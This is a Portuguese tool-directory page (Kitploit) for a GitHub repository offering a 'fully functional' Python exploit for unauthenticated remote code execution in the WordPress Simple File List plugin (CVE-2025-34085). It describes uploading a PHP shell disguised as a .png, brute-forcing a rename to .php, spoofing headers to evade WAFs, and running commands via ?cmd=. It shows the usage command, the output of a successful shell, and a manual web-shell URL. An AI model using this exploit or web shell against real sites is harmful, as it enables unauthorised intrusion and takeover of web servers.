Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-34085 — Simple File List – Exploit de RCE Não Autenticado (CVE-2025-34085) | Kitploit
Ferramentas/GitHubGitHub/mrjhaxcore/cve-2025-34085
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubmrjhaxcore/cve-2025-34085

CVE-2025-34085

Simple File List – Exploit de RCE Não Autenticado (CVE-2025-34085)

Ver Repositório
17há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

📂 Simple File List – Exploração de RCE não autenticada (CVE-2025-34085)

⚠️ Código do Exploit por: Mrj Haxcore

Um exploit em Python totalmente funcional para o plugin Simple File List do WordPress (<= 4.2.3), que é vulnerável a execução remota de código (RCE) não autenticada devido a uma lógica insegura de upload e renomeação de arquivos.


💣 Resumo da Vulnerabilidade

  • Plugin: Simple File List (simple-file-list)
  • Versão: <= 4.2.3
  • CVE: CVE-2025-34085
  • Impacto: Utilizadores não autenticados podem carregar um ficheiro PHP disfarçado como .png, renomeá-lo para .php e executar código arbitrário.
  • Requisitos: Nenhuma autenticação necessária
  • Tipo de Exploit: Upload de Ficheiro → Bypass de Renomeação → Execução de Comandos

✅ Funcionalidades

  • 🚀 Cadeia de exploração totalmente automatizada
  • 📤 Construtor manual de multipart/form-data (ignora erro 415)
  • 🔁 Força bruta de renomeação para .php, .php5, .phtml, etc.
  • 🛡️ Cabeçalhos falsos realistas para contornar WAFs
  • 🐚 Execução de comandos via ?cmd=
  • 🧼 Saída limpa (sem lixo �PNG)

🛠 Uso

python3 simple.py https://target.site

[+] Uploading shell as 8dkls0qp.png...
[+] Upload successful.
[+] Trying to rename to: 8dkls0qp.php...
[+] Rename successful: 8dkls0qp.php
[+] Triggering shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
[+] Shell output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Visita Manual

https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami
Baixar ferramenta